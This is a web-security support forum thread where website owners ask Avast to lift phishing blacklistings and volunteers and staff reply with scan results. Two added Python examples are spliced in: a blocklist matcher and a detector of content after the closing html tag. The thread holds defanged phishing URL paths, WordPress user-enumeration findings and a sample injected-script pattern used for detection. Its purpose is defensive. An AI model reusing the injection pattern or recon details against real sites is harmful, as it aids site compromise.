     error: undefined function Object.defineProperty
     error: undefined function console.error
     error: line:5: TypeError: invalid 'in' operand Br

polonus
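Several replies in this thread trace a block to the IP address rather than the site itself: a clean domain inherits the verdict of a neighbour on the same shared address. The sketch below is an added example, not Avast's or FireHOL's code; it assumes a netset-style list with `#` comments and one address or CIDR per line, and the domains and addresses are constructed from documentation ranges.

```python
"""Show which co-hosted domains fall under an IP-based blocklist entry."""
import ipaddress

# Constructed netset-style list: '#' comments, one IPv4 address or CIDR per line.
SAMPLE_NETSET = """\
# constructed sample, documentation ranges only (RFC 5737)
192.0.2.10
198.51.100.0/28   # a whole block of a hosting range
"""

# Constructed hosting map: domain -> resolved address (hypothetical names).
SAMPLE_HOSTING = {
    "clean-shop.example": "192.0.2.10",
    "infected-neighbour.example": "192.0.2.10",
    "other-tenant.example": "198.51.100.7",
    "dedicated.example": "203.0.113.5",
}


def parse_netset(text):
    """Parse the list into ip_network objects, rejecting malformed lines."""
    nets = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = line.split("#", 1)[0].strip()  # drop comments and padding
        if not entry:
            continue
        try:
            # A bare address becomes a /32 (or /128) network.
            nets.append(ipaddress.ip_network(entry, strict=False))
        except ValueError:
            raise ValueError(f"line {lineno}: not an address or CIDR: {entry!r}")
    return nets


def matching_entry(ip, nets):
    """Return the most specific list entry covering `ip`, or None."""
    addr = ipaddress.ip_address(ip)
    hits = [n for n in nets if n.version == addr.version and addr in n]
    return max(hits, key=lambda n: n.prefixlen, default=None)


def shared_ip_report(hosting, nets):
    """Map each listed IP to its list entry and every domain hosted on it."""
    report = {}
    for domain, ip in sorted(hosting.items()):
        entry = matching_entry(ip, nets)
        if entry is None:
            continue
        record = report.setdefault(ip, {"entry": str(entry), "domains": []})
        record["domains"].append(domain)
    return report


if __name__ == "__main__":
    nets = parse_netset(SAMPLE_NETSET)
    for ip, record in shared_ip_report(SAMPLE_HOSTING, nets).items():
        print(ip, "matched", record["entry"], "->", ", ".join(record["domains"]))
```

Every domain listed under one address shares the verdict, which is why the replies above suggest a dedicated IP.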
Title: Re: How to remove my website from your blacklist?
Post by: JL20 on October 17, 2018, 02:41:32 AM
Thank you Polonus !
Title: Re: How to remove my website from your blacklist?
Post by: Yakov7 on October 23, 2018, 08:19:07 AM
Hello.
https://tenders.procurement.gov.ge/

Today it started to be blocked by Avast. Mal:Phishing

We have checked this site almost in all databases and found no issues.
This is Georgian government procurement site.
Please remove from your database
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on October 23, 2018, 08:30:07 AM
You can report a suspected FP (File/Website) here: https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: Yakov7 on October 23, 2018, 08:31:19 AM
Thanks a lot
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on October 23, 2018, 08:32:06 AM
You're welcome.
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on January 15, 2019, 09:38:17 PM
My website https://lafamilledabord.fr/ is blocked by the last version of avast.
The form I found is not meant to be used for complaints anymore.
What shall I do ?
Thanks in advance.
https://forum.avast.com/index.php?topic=127517.msg1480845#msg1480845
Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 15, 2019, 10:28:53 PM
Website had been reported for PHISHING.
Reputation Check
PASSED
Google Safe Browse: OK
Spamhaus Check: OK
Compromised Hosts: OK
Dshield Blocklist: OK
Shadowserver C&C: OK
Web Server:
Apache
X-Powered-By:
None
IP Address:
185.22.109.166
Hosting Provider:
PlanetHoster 
Shared Hosting:

Wait for an avast team member to react, as they are the only ones to come and unblock.
Also report to McAfee's as the website has been blocked from there as well.

A mere two security related recommendations: https://webhint.io/scanner/c17d81e6-48a4-49ae-9d76-e8b661130dd3#Security

10 security glitches here: https://webscan.upguard.com/#/https://lafamilledabord.fr/wp-content/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 16, 2019, 02:04:55 PM
Hi clement34,

They are known to react often within the launch of a new definition update.
Just have some patience for things will work out,

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 17, 2019, 10:59:08 AM
Hi,
This was unblocked an hour ago (and was blocked because of "lafamilledabord[.]fr/paypal[.]php").
Title: Re: How to remove my website from your blacklist?
Post by: Ijaz Ahmad on January 21, 2019, 07:33:33 PM
Sir my website hxxps://www[.]crdo[.]org[.]pk is blocked by avast showing it a phishing url,
while i had checked my site on several scanning websites and my url is not listed anywhere.

Could you help to remove my website hxxps://www[.]crdo[.]org[.]pk from your blocklisted url on avast ?? as it is creating issues for me.
your help will be appreciated please.
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on January 21, 2019, 07:49:43 PM
Sir my website https://www.crdo.org.pk is blocked by avast showing it a phishing url,
while i had checked my site on several scanning websites and my url is not listed anywhere.

Could you help to remove my website https://www.crdo.org.pk from your blocklisted url on avast ?? as it is creating issues for me.
your help will be appreciated please.
https://www.virustotal.com/en/url/632ee3450a579b197253a1e690c039d10e9273d59d2f03112a7c7352120ac7e0/analysis/1548096267/
0/66 Detection Ratio.
Probably a false positive
You can report it here, https://www.avast.com/false-positive-file-form.php

Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 21, 2019, 10:31:37 PM
Submitted to PHISHcheck I get:
Quote
{"sid": 170866, "is_success": true}
.
Also suspicious *.pk domain alerted.
But wait for an avast team member to give the final verdict.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 28, 2019, 10:31:59 AM
Hi,
hxxps://www[.]crdo[.]org[.]pk was removed from our blacklist on 23. 1.
Title: Re: How to remove my website from your blacklist?
Post by: Kuba37 on January 30, 2019, 09:21:33 PM
Hi,

Could you help us remove our shop website: hxxps://berriesandco[.]pl/  from your blocklisted url on avast? Your help will be greatly appreciated.

Many thanks,
Team Berries&Co.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on January 30, 2019, 09:25:06 PM


Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php


Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 31, 2019, 10:21:15 AM
Hi, the domain is blocked due to berriesandco[.]pl/core/wp/ameliass/portailas/appmanager/portailas/amelipro containing (probably fake) form in French (!) that requests credit card number, cvv code and expiration date.
Title: Re: How to remove my website from your blacklist?
Post by: SCompartir on February 22, 2019, 08:53:40 AM
Hello,

We need your help to review one of our sites.
Some users are receiving Avast phishing alerts on the following page: hxxp://lms30.santillanacompartir[.]com/

I checked the link and it looks clean:
https://www.virustotal.com/#/url/4ed49a96f5b774bb096c7adfb0f2fe88c3abb0660c18cc77ee5ed58f264bb69e/detection
https://www.urlvoid.com/scan/lms30.santillanacompartir.com/

Can you please remove it from the list?
thanks in advance
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on February 22, 2019, 09:16:51 AM
You can report a suspected FP (File/Website) here: https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: SCompartir on February 22, 2019, 09:45:13 AM
Thanks Asyn.

We reported it yesterday but we still have no solution. It is an important issue that is causing problems in the schools that use our software.
Any help is very much appreciated
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 24, 2019, 08:15:15 PM
I see only this as content
Quote
Content that was returned by your request for the URL: hxtp://lms30.santillanacompartir.com/

1:  < !DOCTYPE>
2:  < html>
3:  < head>
4:  < title> EB EV-SAN ALB< /title>
5:  < /head>
6:  < body>
7:  < p> .INF-EV-SAN-LMS-APP.< /p>
8:  < /body>
9:  < /html>

Also consider: http://ikeyword.net/lms.santillanacompartir.com

IP block, probably because of this report: https://www.threatcrowd.org/domain.php?domain=-ecf.d41 dot co

Wait for a final verdict from an avast team member, as we here are just volunteers with relative knowledge
and only avast team members can come and unblock,

polonus (volunteer website security analyst and website error-hunter)


Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 25, 2019, 11:16:34 AM
Hi,
I have removed the detection on lms30.santillanacompartir[.]com/student/document.
Title: Re: How to remove my website from your blacklist?
Post by: SCompartir on February 25, 2019, 12:32:00 PM
Quote from: HonzaZ
Hi,
I have removed the detection on lms30.santillanacompartir[.]com/student/document.

Thanks HonzaZ, we're going to check it ASAP.
Title: Re: How to remove my website from your blacklist?
Post by: alexb2 on March 20, 2019, 04:58:38 PM
Hello,

It seems that our client's website has been blacklisted: https://nyleadpaintexperts[.]com
Can you have a look, please?
Here are the reports from UrlVoid and VirusTotal:

https://www.urlvoid.com/scan/nyleadpaintexperts.com/
https://www.virustotal.com/gui/url/e7f706b3c0b39495c14d737d382224d2a2293d85451b67056f37cb761ccd4759/detection

Thank you,
Alex
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 21, 2019, 07:40:22 AM
Hi,
I have removed nyleadpaintexperts[.]com from our blacklist.
Honza
Title: Re: How to remove my website from your blacklist?
Post by: support-fr on March 25, 2019, 11:52:12 AM
Hi all,

Can you check on your system why our website URL (na2se.voxco.com) is blacklisted, please?
We are an international online survey company and we're interviewing many people by using this website from email invitation.

NB: I've checked many sites to see if our URL is clean, and this is the way, all lights are green

Thank you in advance for your help

Best Regards
Sebastien
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 25, 2019, 12:04:31 PM
Hi,
na2se.voxco[.]com was removed from our blacklist an hour ago.
Title: Re: How to remove my website from your blacklist?
Post by: isp on March 25, 2019, 12:43:35 PM
Hi, we have cleaned fadq.org

Can you please unblock?

Cheers,
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 25, 2019, 12:53:37 PM
Nice to hear that, I have removed fadq[.]org from our blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: cengiztaskin0 on March 27, 2019, 01:49:32 PM
Hi,

I get a phishing error for my website https://www.teknolojionline.net when avast is on. I checked with urlvoid and virustotal but it looks clean. Can you check, please?
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on March 27, 2019, 01:57:10 PM
-> https://sitecheck.sucuri.net/results/https/www.teknolojionline.net
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 27, 2019, 02:14:03 PM
Site now responds with a 500 Server error.
See: https://urlquery.net/report/2b77c249-3ab2-475c-a766-86f451c0060a

Wait for a final verdict of an avast team member, as they are the only ones to eventually unblock.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 28, 2019, 09:35:05 AM
We blocked the whole domain because we noticed phishing here: teknolojionline[.]net/update/account/zrzpdaynfe4n7xm1u734bmzq.php?wa=wsignin1.0&rpsnv=13&ct=1790861588&rver=a237a9dbd66258836a26716120f2c8f6&wp=mbi_ssl_shared&wreply=inbox&lc=1024&id=a237a9dbd66258836a26716120f2c8f6&mkt=en-us&cbcxt=mai&email=
Title: Re: How to remove my website from your blacklist?
Post by: perkins on March 28, 2019, 11:09:23 AM
Hi,

Avast pops up reporting that my website www.backcouture[.]com is supposedly infected. According to Mcafee and Sucuri's sitecheck, the website is clean.

Please check it, regards
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 28, 2019, 11:43:54 AM
Hi,
backcouture[.]com was removed from our blacklist a week ago.
Title: Re: How to remove my website from your blacklist?
Post by: cengiztaskin0 on March 28, 2019, 12:22:47 PM
Quote from: HonzaZ
We blocked the whole domain because we noticed phishing here: teknolojionline[.]net/update/account/zrzpdaynfe4n7xm1u734bmzq.php?wa=wsignin1.0&rpsnv=13&ct=1790861588&rver=a237a9dbd66258836a26716120f2c8f6&wp=mbi_ssl_shared&wreply=inbox&lc=1024&id=a237a9dbd66258836a26716120f2c8f6&mkt=en-us&cbcxt=mai&email=

We delete whole directory and move our site to another hosting without transferring any data. The link you provide is giving 404 now. Can you tell me please, is there anything I can do for removal?
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on March 28, 2019, 08:29:51 PM
Quote from: HonzaZ
We blocked the whole domain because we noticed phishing here: teknolojionline[.]net/update/account/zrzpdaynfe4n7xm1u734bmzq.php?wa=wsignin1.0&rpsnv=13&ct=1790861588&rver=a237a9dbd66258836a26716120f2c8f6&wp=mbi_ssl_shared&wreply=inbox&lc=1024&id=a237a9dbd66258836a26716120f2c8f6&mkt=en-us&cbcxt=mai&email=

Quote from: cengiztaskin0
We delete whole directory and move our site to another hosting without transferring any data. The link you provide is giving 404 now. Can you tell me please, is there anything I can do for removal?

Hi, I checked the site and removed it from blacklist.

Regards
Lukas
Title: Re: How to remove my website from your blacklist?
Post by: code4webs on April 03, 2019, 08:14:56 PM
Hello avast support,
I also see my website blacklisted:
Domain blacklisted by McAfee: www.benetofoods[.]com
So how can you make it whitelisted and safe?
Thanks in advance.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 03, 2019, 11:07:02 PM
4 engines detect: https://www.virustotal.com/#/url/b4cf7c9ef7e7069b106a4f3b7006c100c794974f28607cb162b2ac685edf0f44/detection
Threats to the website: https://webscan.upguard.com/#/www.benetofoods.com
Re:
Quote
  Content after the < /html> tag should be considered suspicious.
< !-- WP Fastest Cache file was created in 0.2729640007019 seconds, on 03-04-19 22:56:37 --> < !-- need to refresh to see cached version -->
-> https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LmJ7bnt0XWZdXSNzLl5dbQ%3D%3D~enc
Blacklisted: https://sitecheck.sucuri.net/results/www.benetofoods.com
Plug-in update required:    weglot 2.5.0   latest release (2.7.0) Update required
http://wordpress.org/plugins/weglot/

Disable please -> User Enumeration
  The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   None   benetofoods
2   None   stuff
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

263 recommendations to improve your website: https://webhint.io/scanner/58bf5295-0359-4b65-ae73-62c33326d1df

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
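
Added example, not part of the post above or of any scanner it cites: a Python check for the "content after the </html> tag" finding, separating a harmless cache-plugin comment (as in the benetofoods report) from trailing markup that can load or run something. The sample pages, the `scan` function and the verdict names are constructed for illustration.

```python
"""Classify whatever a server sends after the first real </html> end tag."""
from html.parser import HTMLParser

# Tags that can load or run something; one of these after </html> needs review.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "form", "meta", "link", "a"}


class TrailingContentScanner(HTMLParser):
    """Records comments, tags and text seen after </html>.

    HTMLParser treats <script> bodies as raw text, so a literal "</html>"
    inside a script string is not mistaken for the closing tag.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.closed = False
        self.comments, self.tags, self.text = [], [], []

    def handle_endtag(self, tag):
        if tag == "html":
            self.closed = True

    def handle_starttag(self, tag, attrs):
        if self.closed:
            self.tags.append((tag, dict(attrs)))

    def handle_comment(self, data):
        if self.closed:
            self.comments.append(data.strip())

    def handle_data(self, data):
        if self.closed and data.strip():
            self.text.append(data.strip())


def scan(html):
    """Return a verdict plus the evidence found after </html>."""
    parser = TrailingContentScanner()
    parser.feed(html)
    parser.close()  # flush buffered text at end of input
    active = sorted({t for t, _ in parser.tags if t in ACTIVE_TAGS})
    if not parser.closed:
        verdict = "no-closing-tag"
    elif active:
        verdict = "review-active"      # trailing script/iframe/etc.
    elif parser.tags or parser.text:
        verdict = "review-markup"      # trailing visible text or inert tags
    elif parser.comments:
        verdict = "comments-only"      # typical cache-plugin footer
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "comments": parser.comments,
        "tags": [t for t, _ in parser.tags],
        "text": parser.text,
    }


# --- Constructed sample pages (not fetched from any site) ---
PAGE = "<!DOCTYPE html><html><head><title>t</title></head><body><p>ok</p></body></html>"
CLEAN = PAGE + "\n"
# Cache footer as quoted in the post, written as real HTML comments.
CACHED = PAGE + (
    "<!-- WP Fastest Cache file was created in 0.2729640007019 seconds, "
    "on 03-04-19 22:56:37 --><!-- need to refresh to see cached version -->"
)
# Constructed injection pattern: a script appended after the document ends.
INJECTED = PAGE + '\n<script src="https://static.example.invalid/c.js"></script>'
# "</html>" inside a script string must not end the document early.
STRING_ONLY = (
    '<html><head><script>var s = "</html>";</script></head>'
    "<body>x</body></html>"
)

if __name__ == "__main__":
    for name, page in [("clean", CLEAN), ("cached", CACHED),
                       ("injected", INJECTED), ("string", STRING_ONLY)]:
        print(name, scan(page))
```

A "comments-only" verdict matches the cache footer in the report; anything under "review-active" should be traced to the template or file that emits it.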
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on April 03, 2019, 11:46:27 PM
@ code4webs,
Please make the link unselectable. We don't need live links to possibly dangerous sites. Thanks
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on April 04, 2019, 09:19:09 AM
Quote from: code4webs
Domain blacklisted by McAfee: www.benetofoods[.]com
So how can you make it whitelisted and safe?

Contact McAfee :)
Title: Re: How to remove my website from your blacklist?
Post by: Alberto217 on April 04, 2019, 11:25:23 AM
I need unblock the site www.aspanri.org, can help me?, thanks
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on April 04, 2019, 11:35:23 AM
Quote from: Alberto217
I need unblock the site www.aspanri.org, can help me?, thanks

Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 04, 2019, 01:25:11 PM
Hi Pondus,

Checked at VT, not until this is being removed. Good detection? See:
https://www.virustotal.com/#/file/9fd6e3fa2084b4f30b734144765e6a1453fd4dde5425688e37cfac92dbde6a52/detection
avast detects as PDF:UrlMal-inf [Trj] or this must be a false positive?

pol
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on April 10, 2019, 12:36:12 AM
Quote from: Alberto217
I need unblock the site www[.]aspanri[.]org, can help me?, thanks

Detection was removed on 09.04.2019 at 11:27 AM

Quote from: Avast
Our virus specialists have now cleared its reputation in our database.

With URLs this change should be instant, but it might take up to 24 hours with files.
Title: Re: How to remove my website from your blacklist?
Post by: Ashutosh9 on April 24, 2019, 08:49:28 AM
Avast aborting connection on http://shardatech[.]org and showing reason as URL:Phishing.
Please help me out
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on April 24, 2019, 09:04:35 AM
I have removed shardatech[.]org from our blacklist ;-)
Title: Re: How to remove my website from your blacklist?
Post by: Jared67 on April 27, 2019, 11:57:47 PM
Hello - Can you please check laportecountyhistory[.]org and remove from your blacklist? The site has been rebuilt and is on a different hosting environment, malware free :-) Thank you in advance!
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 28, 2019, 12:35:36 AM
Hi Jared67,

See the history of what was flagged on your website here:
https://www.virustotal.com/#/domain/laportecountyhistory.org
Latest detection of recent PHISHING here: https://www.virustotal.com/#/url/4796f5d1a5801dae440e5202922df03561b679e71154183a792e1a2d12e3d3bd/detection

See: https://www.virustotal.com/#/file/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/community

Site is blacklisted: https://sitecheck.sucuri.net/results/https/laportecountyhistory.org

Update a.s.a.p: The following plugins were detected by reading the HTML source of the WordPress sites front page.

Ultimate_VC_Addons   
woo-gutenberg-products-block 1.4.0   latest release (2.0.1)
https://github.com/woocommerce/woocommerce-gutenberg-products-block
woocommerce 3.5.7   latest release (3.6.2)
https://woocommerce.com/
mpc-massive   
revslider   
global-gallery   
js_composer   
Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.

DOM-XSS issues: Results from scanning URL: -https://laportecountyhistory.org
Number of sources found: 14 ; number of sinks found: 129
&
Results from scanning URL: -https://laportecountyhistory.org/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.1
Number of sources found: 41 ; number of sinks found: 17

Wait for an avast team member for a final verdict on your website, we here are just volunteers with relevant knowledge,
but cannot come and unblock.

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: EllieW on April 28, 2019, 06:53:16 AM
Please remove quitsmokingalbany.com from your blacklist - site was cleaned - moved to new host - taken off all blacklists but yours - sucuri sitecheck shows it is clean.

Thank You
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on April 28, 2019, 06:59:40 AM
-> https://www.virustotal.com/#/url/94bf31f038a9868e920e341511329b34bc4d3dada5a3f7ef90ad9c5016f319a0/detection
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 28, 2019, 01:29:07 PM
Hi EllieW,

Detection probably because IP is mentioned in PHISHING- and spam-reports, like:
https://checkphish.ai/ip/96.9.220.170
&
https://cleantalk.org/blacklists/96.9.220.167

See: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=cXVbdHNtXWtbbmd8bGJ8bnkuXl1t~enc
Nothing new when you share your address on this IP with 1664 other sites found on 96.9.220.170.

Site comes Google OK-ed, so wait for an avast team member to give the final verdict,
as they are the only ones to come and unblock.

Recommendations to come to a more secure site are given here: https://sitecheck.sucuri.net/results/quitsmokingalbany.com
and also here: https://webhint.io/scanner/64355e00-0ac8-40ef-91cd-fe94145fbe46 (140 hints in all).

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)

P.S.  Off-topic - I gave up on smoking some 30 years ago. Keep up the good work  ;)

polonus
Title: Re: How to remove my website from your blacklist?
Post by: savcin on April 29, 2019, 12:24:20 PM
Fixed
Title: Re: How to remove my website from your blacklist?
Post by: mariustgv2004 on May 02, 2019, 05:59:03 PM
Can you please remove djstneamt.ro and all the related urls from your blacklist? I reinstalled the platform and it's clean now. Also, I've changed the hosting. Thank you.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on May 02, 2019, 06:03:34 PM
Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php


Something you can fix
https://retire.insecurity.today/#!/scan/64e902de89a3864e75e6233fa5cd4a2f359eae312d56004f72260034538b3dda


Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 02, 2019, 06:51:46 PM
Various server misconfigurations: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=I2pzdG57fG10Ln1dYF5nWy1zeXNgI3tmfHVsdHd7YnB8Z3suXmdb~enc
not secure...

Pondus could have given you these results, where 2 flag as website PHISHING (fortinet's)  and as malicious (SOPHOS):
https://www.virustotal.com/en/url/eae3566e6281aec2e1a75b469b842d16768df120e5f8e7175777d225c03aa785/analysis/1556815452/

Site blacklisted: https://sitecheck.sucuri.net/results/djstneamt.ro  Quttera gives it as clean.

Wait for a final verdict from an avast team member, as they are the only ones to come and unblock.

See: https://www.shodan.io/host/185.195.18.227

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on May 03, 2019, 03:27:08 AM
Detection has been removed  02.05.2019 laportecountyhistory.org and djstneamt.ro is no longer blocked. 

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided website isn't detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: kexag31 on May 14, 2019, 05:40:00 PM
my site https://subz.xyz is blocked by avast.
Can you please check and remove the block?

Thanks,
kexag31

https://prnt.sc/nohsyh
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 15, 2019, 10:25:30 AM
2 to flag: https://www.virustotal.com/#/domain/subz.xyz   subject abuse elevated exposure...
Security Checks for subz.xyz
(4) Domain at risk of being hijacked
Vulnerabilities can be uncovered more easily
(5) Susceptible to man-in-the-middle attacks
DNS is susceptible to man-in-the-middle attacks  source: upguard..

See: https://www.virustotal.com/#/url/6609e4c740eb57ca2d091b212978d902f10f9b8734498715e937fc48360d3a8a/detection
malware in this script min.js: https://www.virustotal.com/#/url/bb34986e109d1de6044fa1df2cdd1d1b8292a4802f3c020612778c2846f3b7e1/detection

Wait for an avast team member to give a final verdict, you are no victim to form-jacking...

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on May 16, 2019, 01:13:05 PM
Quote from: kexag31
my site htxps://subz[.]xyz is blocked by avast.
Can you please check and remove the block?

Thanks,
kexag31

https://prnt.sc/nohsyh

Detection was removed yesterday.

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided website isn't detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: Bahadir7 on May 17, 2019, 03:46:11 PM
hello. http://www.lorawedding.com blocked.

virustotal : https://www.virustotal.com/gui/url/3108ee7132fad40925d7f282cdab80db63fa55badd372db96f1368642c3c29c6/detection

http://www.lorawedding.com - all clean

------

https://www.lorawedding.com
CLEAN MX : Malicious

They don't respond to my email.

can you remove site from your blacklist
Title: Re: How to remove my website from your blacklist?
Post by: mchain on May 18, 2019, 06:47:43 AM
https://quttera.com/detailed_report/www.lorawedding.com
Title: Re: How to remove my website from your blacklist?
Post by: Bahadir7 on May 18, 2019, 09:15:24 AM
mchain thank you for your help.

i fixed quttera.

https://quttera.com/detailed_report/www.lorawedding.com
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 19, 2019, 01:45:37 PM
Still see a blacklist url detection warning from avast,

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on May 22, 2019, 02:33:12 AM
Quote from: Bahadir7
hello. hxxp://www.lorawedding[.]com blocked.

virustotal : https://www.virustotal.com/gui/url/3108ee7132fad40925d7f282cdab80db63fa55badd372db96f1368642c3c29c6/detection

hxxp://www.lorawedding[.]com - all clean

------

hxxps://www.lorawedding[.]com
CLEAN MX : Malicious

They don't respond to my email.

can you remove site from your blacklist

Detection was removed 21.05.2019

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided URL is not detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: team7 on May 24, 2019, 08:59:21 PM
Can you check our site. Is blacklisted by Avast. www.pinpointlv.com
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 24, 2019, 10:02:10 PM
Is this meant to be there? The location line in the header above has redirected the request to: -https://pinpointlv.com/

( If this redirect is not what you expected SEE: Redirects. for some tips on clearing redirects.)


Via: -http/1.1 a2nlwpproxy015.prod.iad2.secureserver.net (ApacheTrafficServer/7.1.2 [uSc s f p eN:tOc i p sS])
Server: ATS/7.1.2

Three detect: https://www.virustotal.com/#/url/f32fd8910e1f8e3bac4211e4047606abdd5d0284623a5fdc91a0e40bc683dfe4/detection
Blacklisted: https://urlquery.net/report/a08383f3-71b7-4adf-afe1-9f5e98d9e8ed  probably IP related..


Here site is given OK: https://sitecheck.sucuri.net/results/https/www.pinpointlv.com

Word Press version - Version does not appear to be latest

Webshield detects phishing, wait for a final verdict from an avast team member,
on google analytics I get failed to load resource: the server responded with a status of 404 () Golfe2

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on May 29, 2019, 03:13:27 AM
Quote from: team7
Can you check our site. Is blacklisted by Avast. wxw.pinpointlv[.]com

Detection was removed 28.05.2019

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided URL is not detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 29, 2019, 05:25:01 PM
Retirable jQuery library detected here:
Retire.js
jquery   1.12.4   Found in -https://pinpointlv.com/wp-content/cache/busting/1/wp-includes/js/jquery/jquery-1.12.4.js
Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   

DOM-XSS sinks & sources: Results from scanning URL: -https://pinpointlv.com
Number of sources found: 1
Number of sinks found: 121

Results from scanning URL: -https://pinpointlv.com/wp-content/cache/busting/1/wp-includes/js/jquery/jquery-1.12.4.js
Number of sources found: 41
Number of sinks found: 17

Results from scanning URL: -https://pinpointlv.com/wp-content/cache/busting/1/wp-includes/js/jquery/jquery-1.12.4.js
Number of sources found: 188
Number of sinks found: 97

polonus
Title: Re: How to remove my website from your blacklist?
Post by: belykhalexander on May 31, 2019, 11:13:45 AM
Hello,

Our website http://www.brightelec.ru/ is reported as being in the avast blacklist.
The site seems to be clean. Could you please check?

Best regards,
Alexander
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on May 31, 2019, 11:21:03 AM
-> https://sitecheck.sucuri.net/results/www.brightelec.ru
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 01, 2019, 07:02:52 PM
IP related detection: https://www.abuseipdb.com/check/185.165.123.206 (800 sites share this IP address!).
E-grade results: https://securityheaders.com/?q=www.brightelec.ru&hide=on&followRedirects=on
207 improvement hints:  https://webhint.io/scanner/985b7b86-bc97-4d5d-817d-f03e9b8cbe08
security related: https://webhint.io/scanner/985b7b86-bc97-4d5d-817d-f03e9b8cbe08#category-Security
consider: https://www.virustotal.com/gui/domain/www.brightelec.ru/details

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on June 03, 2019, 01:03:09 PM
Quote from: belykhalexander
Hello,

Our website hxxp://www.brightelec[.]ru/ is reported as being in the avast blacklist.
The site seems to be clean. Could you please check?

Best regards,
Alexander

Detection was removed 03.06.2019 at 07:54 a.m.

Quote from: Avast
Our virus specialists have now cleared its reputation in our database.

With URLs this change should be instant, but it might take up to 24 hours with files.
Title: Re: How to remove my website from your blacklist?
Post by: mjo_stluke on June 05, 2019, 11:01:37 PM
Our website stlukesavl.org is currently blocked. The site is hosted by aplus.net/deluxe checks. You have their control panel domain blacklisted as well. myutilitydomain.com. This causes suspicious script problems/blacklist.

I have run sitecheck and virus total on stlukesavl.org and we are clean. myutilitydomain and our related subdomain to access our control panel should be de-blacklisted. The entire domain name and control panel access of a major hosting company should not be blacklisted. 

Please Help.

Thanks,
Mark
Title: Re: How to remove my website from your blacklist?
